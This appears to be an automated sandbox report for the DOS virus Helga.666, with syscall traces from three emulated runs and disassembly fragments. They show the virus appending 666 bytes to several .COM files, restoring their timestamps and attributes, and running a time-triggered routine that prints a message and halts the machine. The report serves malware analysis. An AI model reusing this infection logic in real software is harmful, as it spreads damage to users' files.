Sample viewer

vx.netlux.org/Virus.DOS.Helga.666.a

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:10:53.897928579Z 26 PC: 12b04 | Set disk transfer address
2018-12-17T23:10:53.899093301Z 78 PC: 12b17 | Find first file
2018-12-17T23:10:53.904066886Z 47 PC: 12b1d | Get disk transfer address
2018-12-17T23:10:53.905330189Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T23:10:53.909743493Z 67 PC: 12cab | Get or set file attributes
2018-12-17T23:10:53.932224304Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:10:53.939878325Z 87 PC: 12cb8 | Get or set file date and time
2018-12-17T23:10:53.941600281Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:53.958273809Z 66 PC: 12b79 | Move file pointer
2018-12-17T23:10:53.960518739Z 44 PC: 12ace | Get time 0x12ace: xor cx, dx
0x12ad0: xor ch, cl
0x12ad2: mov byte ptr [di + 0x10], ch
0x12ad5: call 0x22aae
0x12ad8: pop bx
0x12ad9: popaw
0x12ada: mov ah, byte ptr [di + 9]
0x12add: mov cx, 0x29a
0x12ae0: nop
0x12ae1: mov dx, di
0x12ae3: int 0x21
0x12ae5: pushaw
0x12ae6: call 0x22aae
0x12ae9: pop bx
0x12aea: popaw
0x12aeb: ret
0x12aec: xchg si, di
0x12aee: pop si
0x12aef: sub si, 6
0x12af2: push si
2018-12-17T23:10:53.964064779Z 64 PC: 12ae5 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:10:53.975256423Z 66 PC: 12b97 | Move file pointer
2018-12-17T23:10:53.977894824Z 64 PC: 12bb7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:53.987379127Z 87 PC: 12bc0 | Get or set file date and time
2018-12-17T23:10:53.990098332Z 62 PC: 12bc6 | Close file
2018-12-17T23:10:54.006230668Z 67 PC: 12bcd | Get or set file attributes
2018-12-17T23:10:54.017632812Z 79 PC: 12b17 | Find next file
2018-12-17T23:10:54.0207718Z 47 PC: 12b1d | Get disk transfer address
2018-12-17T23:10:54.022885723Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T23:10:54.029906708Z 67 PC: 12cab | Get or set file attributes
2018-12-17T23:10:54.04973411Z 61 PC: 12cb1 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:10:54.058615858Z 87 PC: 12cb8 | Get or set file date and time
2018-12-17T23:10:54.060713311Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:54.068471232Z 66 PC: 12b79 | Move file pointer
2018-12-17T23:10:54.082403851Z 44 PC: 12ace | Get time 0x12ace: xor cx, dx
0x12ad0: xor ch, cl
0x12ad2: mov byte ptr [di + 0x10], ch
0x12ad5: call 0x22aae
0x12ad8: pop bx
0x12ad9: popaw
0x12ada: mov ah, byte ptr [di + 9]
0x12add: mov cx, 0x29a
0x12ae0: nop
0x12ae1: mov dx, di
0x12ae3: int 0x21
0x12ae5: pushaw
0x12ae6: call 0x22aae
0x12ae9: pop bx
0x12aea: popaw
0x12aeb: ret
0x12aec: xchg si, di
0x12aee: pop si
0x12aef: sub si, 6
0x12af2: push si
2018-12-17T23:10:54.086660804Z 64 PC: 12ae5 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:10:54.096422729Z 66 PC: 12b97 | Move file pointer
2018-12-17T23:10:54.099294877Z 64 PC: 12bb7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:54.107006573Z 87 PC: 12bc0 | Get or set file date and time
2018-12-17T23:10:54.109215961Z 62 PC: 12bc6 | Close file
2018-12-17T23:10:54.119220691Z 67 PC: 12bcd | Get or set file attributes
2018-12-17T23:10:54.130485639Z 79 PC: 12b17 | Find next file
2018-12-17T23:10:54.133888114Z 47 PC: 12b1d | Get disk transfer address
2018-12-17T23:10:54.136165702Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T23:10:54.143867339Z 67 PC: 12cab | Get or set file attributes
2018-12-17T23:10:54.151251675Z 61 PC: 12cb1 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:10:54.159836676Z 87 PC: 12cb8 | Get or set file date and time
2018-12-17T23:10:54.161925284Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:54.175579321Z 66 PC: 12b79 | Move file pointer
2018-12-17T23:10:54.177526943Z 44 PC: 12ace | Get time 0x12ace: xor cx, dx
0x12ad0: xor ch, cl
0x12ad2: mov byte ptr [di + 0x10], ch
0x12ad5: call 0x22aae
0x12ad8: pop bx
0x12ad9: popaw
0x12ada: mov ah, byte ptr [di + 9]
0x12add: mov cx, 0x29a
0x12ae0: nop
0x12ae1: mov dx, di
0x12ae3: int 0x21
0x12ae5: pushaw
0x12ae6: call 0x22aae
0x12ae9: pop bx
0x12aea: popaw
0x12aeb: ret
0x12aec: xchg si, di
0x12aee: pop si
0x12aef: sub si, 6
0x12af2: push si
2018-12-17T23:10:54.181063217Z 64 PC: 12ae5 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:10:54.190337392Z 66 PC: 12b97 | Move file pointer
2018-12-17T23:10:54.192191137Z 64 PC: 12bb7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:54.200215307Z 87 PC: 12bc0 | Get or set file date and time
2018-12-17T23:10:54.202065007Z 62 PC: 12bc6 | Close file
2018-12-17T23:10:54.210963602Z 67 PC: 12bcd | Get or set file attributes
2018-12-17T23:10:54.224878782Z 79 PC: 12b17 | Find next file
2018-12-17T23:10:54.227877211Z 47 PC: 12b1d | Get disk transfer address
2018-12-17T23:10:54.229196084Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T23:10:54.237097941Z 67 PC: 12cab | Get or set file attributes
2018-12-17T23:10:54.248080096Z 61 PC: 12cb1 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:10:54.256806386Z 87 PC: 12cb8 | Get or set file date and time
2018-12-17T23:10:54.259742942Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:54.268247839Z 66 PC: 12b79 | Move file pointer
2018-12-17T23:10:54.269870959Z 44 PC: 12ace | Get time 0x12ace: xor cx, dx
0x12ad0: xor ch, cl
0x12ad2: mov byte ptr [di + 0x10], ch
0x12ad5: call 0x22aae
0x12ad8: pop bx
0x12ad9: popaw
0x12ada: mov ah, byte ptr [di + 9]
0x12add: mov cx, 0x29a
0x12ae0: nop
0x12ae1: mov dx, di
0x12ae3: int 0x21
0x12ae5: pushaw
0x12ae6: call 0x22aae
0x12ae9: pop bx
0x12aea: popaw
0x12aeb: ret
0x12aec: xchg si, di
0x12aee: pop si
0x12aef: sub si, 6
0x12af2: push si
2018-12-17T23:10:54.272653214Z 64 PC: 12ae5 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:10:54.282648544Z 66 PC: 12b97 | Move file pointer
2018-12-17T23:10:54.284309807Z 64 PC: 12bb7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:54.291565049Z 87 PC: 12bc0 | Get or set file date and time
2018-12-17T23:10:54.293928853Z 62 PC: 12bc6 | Close file
2018-12-17T23:10:54.302806031Z 67 PC: 12bcd | Get or set file attributes
2018-12-17T23:10:54.313774898Z 79 PC: 12b17 | Find next file
2018-12-17T23:10:54.317060825Z 47 PC: 12b1d | Get disk transfer address
2018-12-17T23:10:54.318235371Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T23:10:54.324416213Z 67 PC: 12cab | Get or set file attributes
2018-12-17T23:10:54.335945776Z 61 PC: 12cb1 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:10:54.349869345Z 87 PC: 12cb8 | Get or set file date and time
2018-12-17T23:10:54.351334537Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:54.358776604Z 66 PC: 12b79 | Move file pointer
2018-12-17T23:10:54.360273532Z 44 PC: 12ace | Get time 0x12ace: xor cx, dx
0x12ad0: xor ch, cl
0x12ad2: mov byte ptr [di + 0x10], ch
0x12ad5: call 0x22aae
0x12ad8: pop bx
0x12ad9: popaw
0x12ada: mov ah, byte ptr [di + 9]
0x12add: mov cx, 0x29a
0x12ae0: nop
0x12ae1: mov dx, di
0x12ae3: int 0x21
0x12ae5: pushaw
0x12ae6: call 0x22aae
0x12ae9: pop bx
0x12aea: popaw
0x12aeb: ret
0x12aec: xchg si, di
0x12aee: pop si
0x12aef: sub si, 6
0x12af2: push si
2018-12-17T23:10:54.362930744Z 64 PC: 12ae5 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:10:54.372838391Z 66 PC: 12b97 | Move file pointer
2018-12-17T23:10:54.374339468Z 64 PC: 12bb7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:54.381546305Z 87 PC: 12bc0 | Get or set file date and time
2018-12-17T23:10:54.383486797Z 62 PC: 12bc6 | Close file
2018-12-17T23:10:54.392448186Z 67 PC: 12bcd | Get or set file attributes
2018-12-17T23:10:54.403908302Z 79 PC: 12b17 | Find next file
2018-12-17T23:10:54.408830513Z 47 PC: 12b1d | Get disk transfer address
2018-12-17T23:10:54.410361759Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T23:10:54.416990963Z 67 PC: 12cab | Get or set file attributes
2018-12-17T23:10:54.428751334Z 61 PC: 12cb1 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:10:54.437203923Z 87 PC: 12cb8 | Get or set file date and time
2018-12-17T23:10:54.439060283Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:54.446634991Z 66 PC: 12b79 | Move file pointer
2018-12-17T23:10:54.44935034Z 44 PC: 12ace | Get time 0x12ace: xor cx, dx
0x12ad0: xor ch, cl
0x12ad2: mov byte ptr [di + 0x10], ch
0x12ad5: call 0x22aae
0x12ad8: pop bx
0x12ad9: popaw
0x12ada: mov ah, byte ptr [di + 9]
0x12add: mov cx, 0x29a
0x12ae0: nop
0x12ae1: mov dx, di
0x12ae3: int 0x21
0x12ae5: pushaw
0x12ae6: call 0x22aae
0x12ae9: pop bx
0x12aea: popaw
0x12aeb: ret
0x12aec: xchg si, di
0x12aee: pop si
0x12aef: sub si, 6
0x12af2: push si
2018-12-17T23:10:54.453106168Z 64 PC: 12ae5 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:10:54.463827862Z 66 PC: 12b97 | Move file pointer
2018-12-17T23:10:54.478268938Z 64 PC: 12bb7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:54.486357907Z 87 PC: 12bc0 | Get or set file date and time
2018-12-17T23:10:54.489121877Z 62 PC: 12bc6 | Close file
2018-12-17T23:10:54.499563904Z 67 PC: 12bcd | Get or set file attributes
2018-12-17T23:10:54.51071262Z 79 PC: 12b17 | Find next file
2018-12-17T23:10:54.514052245Z 47 PC: 12b1d | Get disk transfer address
2018-12-17T23:10:54.516502793Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T23:10:54.523275971Z 67 PC: 12cab | Get or set file attributes
2018-12-17T23:10:54.534408509Z 61 PC: 12cb1 | Open file (Filename = 'PAH.COM')
2018-12-17T23:10:54.542621378Z 87 PC: 12cb8 | Get or set file date and time
2018-12-17T23:10:54.544286864Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:54.552367349Z 66 PC: 12b79 | Move file pointer
2018-12-17T23:10:54.555065676Z 44 PC: 12ace | Get time 0x12ace: xor cx, dx
0x12ad0: xor ch, cl
0x12ad2: mov byte ptr [di + 0x10], ch
0x12ad5: call 0x22aae
0x12ad8: pop bx
0x12ad9: popaw
0x12ada: mov ah, byte ptr [di + 9]
0x12add: mov cx, 0x29a
0x12ae0: nop
0x12ae1: mov dx, di
0x12ae3: int 0x21
0x12ae5: pushaw
0x12ae6: call 0x22aae
0x12ae9: pop bx
0x12aea: popaw
0x12aeb: ret
0x12aec: xchg si, di
0x12aee: pop si
0x12aef: sub si, 6
0x12af2: push si
2018-12-17T23:10:54.558692774Z 64 PC: 12ae5 | Write file or device (Write 666 bytes on handle 5)
2018-12-17T23:10:54.568300636Z 66 PC: 12b97 | Move file pointer
2018-12-17T23:10:54.570286224Z 64 PC: 12bb7 | Write file or device (Write 4 bytes on handle 5)
2018-12-17T23:10:54.578950365Z 87 PC: 12bc0 | Get or set file date and time
2018-12-17T23:10:54.581033929Z 62 PC: 12bc6 | Close file
2018-12-17T23:10:54.590000581Z 67 PC: 12bcd | Get or set file attributes
2018-12-17T23:10:54.602193815Z 79 PC: 12b17 | Find next file
2018-12-17T23:10:54.60519449Z 47 PC: 12b1d | Get disk transfer address
2018-12-17T23:10:54.607006096Z 67 PC: 12ca3 | Get or set file attributes
2018-12-17T23:10:54.61420035Z 67 PC: 12cab | Get or set file attributes
2018-12-17T23:10:54.625729161Z 61 PC: 12cb1 | Open file (Filename = 'TEST.COM')
2018-12-17T23:10:54.633186989Z 87 PC: 12cb8 | Get or set file date and time
2018-12-17T23:10:54.63520546Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-17T23:10:54.639924228Z 87 PC: 12bc0 | Get or set file date and time
2018-12-17T23:10:54.641192491Z 62 PC: 12bc6 | Close file
2018-12-17T23:10:54.646343128Z 67 PC: 12bcd | Get or set file attributes
2018-12-17T23:10:54.65716844Z 79 PC: 12b17 | Find next file
2018-12-17T23:10:54.659781085Z 78 PC: 12c66 | Find first file
2018-12-17T23:10:54.664676451Z 78 PC: 12c66 | Find first file
2018-12-17T23:10:54.676552161Z 78 PC: 12bf7 | Find first file
2018-12-17T23:10:54.688660852Z 44 PC: 12d19 | Get time 0x12d19: cmp ch, cl
0x12d1b: je 0x12d1e
0x12d1d: ret
0x12d1e: push ds
0x12d1f: xor ax, ax
0x12d21: mov ds, ax
0x12d23: mov byte ptr [0x417], 0x70
0x12d28: mov ah, 1
0x12d2a: int 0x16
0x12d2c: pop ds
0x12d2d: mov dx, di
0x12d2f: add dx, 0x218
0x12d33: mov ah, 9
0x12d35: int 0x21
0x12d37: cli
0x12d38: hlt
0x12d39: dec ax
0x12d3a: insb byte ptr es:[di], dx
0x12d3c: popaw
0x12d3e: add word ptr [bx], di
2018-12-17T23:10:54.691478904Z 26 PC: 12b36 | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":17008,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:37.676640959Z 26 PC: 12b04 | Set disk transfer address
2018-12-25T12:54:37.679299015Z 78 PC: 12b17 | Find first file
2018-12-25T12:54:37.686772993Z 47 PC: 12b1d | Get disk transfer address
2018-12-25T12:54:37.688763263Z 67 PC: 12ca3 | Get or set file attributes
2018-12-25T12:54:37.695630877Z 67 PC: 12cab | Get or set file attributes
2018-12-25T12:54:37.714418256Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:37.731732204Z 87 PC: 12cb8 | Get or set file date and time
2018-12-25T12:54:37.735149409Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:54:37.751992726Z 66 PC: 12b79 | Move file pointer
2018-12-25T12:54:37.753788201Z 44 PC: 12ace | Get time 0x12ace: xor cx, dx
0x12ad0: xor ch, cl
0x12ad2: mov byte ptr [di + 0x10], ch
0x12ad5: call 0x22aae
0x12ad8: pop bx
0x12ad9: popaw
0x12ada: mov ah, byte ptr [di + 9]
0x12add: mov cx, 0x29a
0x12ae0: nop
0x12ae1: mov dx, di
0x12ae3: int 0x21
0x12ae5: pushaw
0x12ae6: call 0x22aae
0x12ae9: pop bx
0x12aea: popaw
0x12aeb: ret
0x12aec: xchg si, di
0x12aee: pop si
0x12aef: sub si, 6
0x12af2: push si
2018-12-25T12:54:37.756781142Z 64 PC: 12ae5 | Write file or device (Write 666 bytes on handle 5)
2018-12-25T12:54:37.77888076Z 66 PC: 12b97 | Move file pointer
2018-12-25T12:54:37.78832841Z 64 PC: 12bb7 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:54:37.804577345Z 87 PC: 12bc0 | Get or set file date and time
2018-12-25T12:54:37.808319418Z 62 PC: 12bc6 | Close file
2018-12-25T12:54:37.826961596Z 67 PC: 12bcd | Get or set file attributes
2018-12-25T12:54:37.838095115Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:37.841436302Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:37.850266306Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:37.856645221Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:37.867595413Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:37.875613856Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:37.877497984Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:37.885626192Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:37.888240723Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:37.890977319Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:37.900567166Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:37.903495188Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:37.911096261Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:37.913262183Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:37.923361474Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:37.935498796Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:37.938568907Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:37.939828219Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:37.957352828Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:37.965253219Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:37.974124472Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:37.978148615Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:37.985514153Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:37.987100878Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:37.99064424Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.00042563Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.002361532Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.010986765Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.016387547Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.032716883Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.044747375Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.048105532Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.049874698Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.056842025Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.069165955Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.077770744Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.079788351Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.088621755Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.090685011Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.093872787Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.103180971Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.104527433Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.109812793Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.111936589Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.119287314Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.127708299Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.130817447Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.132350184Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.137169304Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.145833504Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.150921433Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.152391431Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.157640754Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.159909423Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.161905999Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.167691017Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.169711951Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.175144739Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.176532351Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.183624221Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.192199596Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.194524642Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.196127381Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.201079289Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.211036655Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.215797582Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.217146426Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.2219035Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.224116181Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.226075278Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.23319479Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.235424591Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.242221714Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.243811303Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.252838181Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.264598003Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.267551746Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.268910814Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.275456831Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.2976636Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.303344634Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.306554129Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.314064643Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:38.315589979Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:38.318996005Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:38.328473934Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:38.330449572Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:38.339007009Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.342494404Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.35168268Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.363101529Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.367573146Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:38.369859753Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:38.376903782Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:38.38868939Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:38.396397322Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:38.399161117Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:38.407464164Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:38.410305754Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:38.418588265Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:38.430704069Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:38.434278449Z 78 PC: 12c66 | Find first file
2018-12-25T12:54:38.441080617Z 78 PC: 12c66 | Find first file (See above)
2018-12-25T12:54:38.448682845Z 78 PC: 12bf7 | Find first file
2018-12-25T12:54:38.455175322Z 44 PC: 12d19 | Get time 0x12d19: cmp ch, cl
0x12d1b: je 0x12d1e
0x12d1d: ret
0x12d1e: push ds
0x12d1f: xor ax, ax
0x12d21: mov ds, ax
0x12d23: mov byte ptr [0x417], 0x70
0x12d28: mov ah, 1
0x12d2a: int 0x16
0x12d2c: pop ds
0x12d2d: mov dx, di
0x12d2f: add dx, 0x218
0x12d33: mov ah, 9
0x12d35: int 0x21
0x12d37: cli
0x12d38: hlt
0x12d39: dec ax
0x12d3a: insb byte ptr es:[di], dx
0x12d3c: popaw
0x12d3e: add word ptr [bx], di
2018-12-25T12:54:38.471766365Z 9 PC: 12d37 | Display string (String= ' �� ����� ������� ����? �������-�������? �� ����� ������� ����? �������� ��� �� ����!')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":1,"Second":0,"TimeBased":true,"OriginalID":17008,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:54:37.747669405Z 26 PC: 12b04 | Set disk transfer address
2018-12-25T12:54:37.750044047Z 78 PC: 12b17 | Find first file
2018-12-25T12:54:37.756790307Z 47 PC: 12b1d | Get disk transfer address
2018-12-25T12:54:37.758097913Z 67 PC: 12ca3 | Get or set file attributes
2018-12-25T12:54:37.764988547Z 67 PC: 12cab | Get or set file attributes
2018-12-25T12:54:37.788114256Z 61 PC: 12cb1 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:54:37.793029215Z 87 PC: 12cb8 | Get or set file date and time
2018-12-25T12:54:37.794311658Z 63 PC: 12b56 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:54:37.800171793Z 66 PC: 12b79 | Move file pointer
2018-12-25T12:54:37.801690521Z 44 PC: 12ace | Get time 0x12ace: xor cx, dx
0x12ad0: xor ch, cl
0x12ad2: mov byte ptr [di + 0x10], ch
0x12ad5: call 0x22aae
0x12ad8: pop bx
0x12ad9: popaw
0x12ada: mov ah, byte ptr [di + 9]
0x12add: mov cx, 0x29a
0x12ae0: nop
0x12ae1: mov dx, di
0x12ae3: int 0x21
0x12ae5: pushaw
0x12ae6: call 0x22aae
0x12ae9: pop bx
0x12aea: popaw
0x12aeb: ret
0x12aec: xchg si, di
0x12aee: pop si
0x12aef: sub si, 6
0x12af2: push si
2018-12-25T12:54:37.803463127Z 64 PC: 12ae5 | Write file or device (Write 666 bytes on handle 5)
2018-12-25T12:54:37.810195907Z 66 PC: 12b97 | Move file pointer
2018-12-25T12:54:37.811849592Z 64 PC: 12bb7 | Write file or device (Write 4 bytes on handle 5)
2018-12-25T12:54:37.827727825Z 87 PC: 12bc0 | Get or set file date and time
2018-12-25T12:54:37.830887426Z 62 PC: 12bc6 | Close file
2018-12-25T12:54:37.842967564Z 67 PC: 12bcd | Get or set file attributes
2018-12-25T12:54:37.854951759Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:37.858772218Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:37.860146002Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:37.86729995Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:37.878570772Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:37.886493952Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:37.888452712Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:37.896640227Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:37.899852256Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:37.903029591Z 64 PC: 12ae5 | Write file or device (See above)
2018-12-25T12:54:37.912621295Z 66 PC: 12b97 | Move file pointer (See above)
2018-12-25T12:54:37.915716459Z 64 PC: 12bb7 | Write file or device (See above)
2018-12-25T12:54:37.922953564Z 87 PC: 12bc0 | Get or set file date and time (See above)
2018-12-25T12:54:37.924624296Z 62 PC: 12bc6 | Close file (See above)
2018-12-25T12:54:37.933737164Z 67 PC: 12bcd | Get or set file attributes (See above)
2018-12-25T12:54:37.945225911Z 79 PC: 12b17 | Find next file (See above)
2018-12-25T12:54:37.948518126Z 47 PC: 12b1d | Get disk transfer address (See above)
2018-12-25T12:54:37.950549103Z 67 PC: 12ca3 | Get or set file attributes (See above)
2018-12-25T12:54:37.957203781Z 67 PC: 12cab | Get or set file attributes (See above)
2018-12-25T12:54:37.968813051Z 61 PC: 12cb1 | Open file (See above)
2018-12-25T12:54:37.977227106Z 87 PC: 12cb8 | Get or set file date and time (See above)
2018-12-25T12:54:37.979299472Z 63 PC: 12b56 | Read file or device (See above)
2018-12-25T12:54:37.987029265Z 66 PC: 12b79 | Move file pointer (See above)
2018-12-25T12:54:37.989355931Z 44 PC: 12ace | Get time (See above)
2018-12-25T12:54:37.993436223Z 64 PC: 12ae5 | Write file or device (See above)
